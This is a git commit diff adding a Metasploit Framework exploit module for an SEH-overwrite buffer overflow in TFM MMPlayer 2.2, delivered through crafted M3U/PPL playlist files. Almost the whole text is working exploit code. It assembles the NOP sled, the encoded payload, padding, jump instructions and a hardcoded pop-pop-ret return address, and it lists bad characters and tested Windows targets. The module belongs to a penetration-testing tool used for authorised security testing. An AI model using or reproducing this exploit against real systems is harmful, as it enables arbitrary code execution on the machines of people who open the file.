Merge branch 'module-tfm_mmplayer' of https://github.com/bcoles/metasploit-framework into bcoles-module-tfm_mmplayer

2012-06-14 21:14:29 -05:00 · 2012-06-14 21:14:29 -05:00 · 75a67d7160
parent fb67fe9161 940f904dee
commit 75a67d7160
1 changed files with 86 additions and 0 deletions
--- a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
+++ b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
@ -0,0 +1,86 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::FILEFORMAT
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'		=> 'TFM MMPlayer (m3u/ppl File) Buffer Overflow',
+			'Description'	=> %q{
+				This module exploits a buffer overflow in MMPlayer 2.2
+				The vulnerability is triggered when opening a malformed M3U/PPL file
+				that contains an overly long string. This results in overwriting a
+				structured exception handler record.
+			},
+			'License'	=> MSF_LICENSE,
+			'Author'	=>
+				[
+					'RjRjh Hack3r',                            # Original discovery and exploit
+					'Brendan Coles <bcoles[at]gmail[dot]com>', # msf exploit
+				],
+			'References'	=>
+				[
+					[ 'EDB', '18656' ], # .m3u
+					[ 'EDB', '18657' ], # .ppl
+				],
+			'DefaultOptions' =>
+				{
+					'ExitFunction' => 'seh',
+					'InitialAutoRunScript' => 'migrate -f',
+				},
+			'Platform'	=> 'win',
+			'Targets'	=>
+				[
+					# Tested on:
+					# Windows XP Pro SP3 - English
+					# Windows 7 Home Basic SP0 - English
+					# Windows Server 2003 Enterprise SP2 - English
+					[ 'Windows Universal', { 'Ret' => 0x00401390 } ], # p/p/r -> MMPlayer.exe
+				],
+			'Payload'	=>
+				{
+					'Size' => 4000,
+					'BadChars' => "\x00\x0a\x0d",
+					'DisableNops' => false,
+				},
+			'Privileged'	 => false,
+			'DisclosureDate' => 'Mar 23 2012',
+			'DefaultTarget'	 => 0
+		))
+
+		register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.ppl']),], self.class)
+
+	end
+
+	def exploit
+
+		nops   = make_nops(10)
+		sc     = payload.encoded
+		offset = Rex::Text.rand_text_alphanumeric(4103 - sc.length - nops.length)
+		jmp    = Rex::Arch::X86.jmp(-4108)            # near jump 4103 bytes
+		nseh   = Rex::Arch::X86.jmp_short(-7)         # jmp back 7 bytes
+		nseh  << Rex::Text.rand_text_alphanumeric(2)
+		seh    = [target.ret].pack('V')
+
+		sploit  = nops
+		sploit << sc
+		sploit << offset
+		sploit << jmp
+		sploit << nseh
+		sploit << seh
+
+		# write file
+		file_create(sploit)
+
+	end
+end
+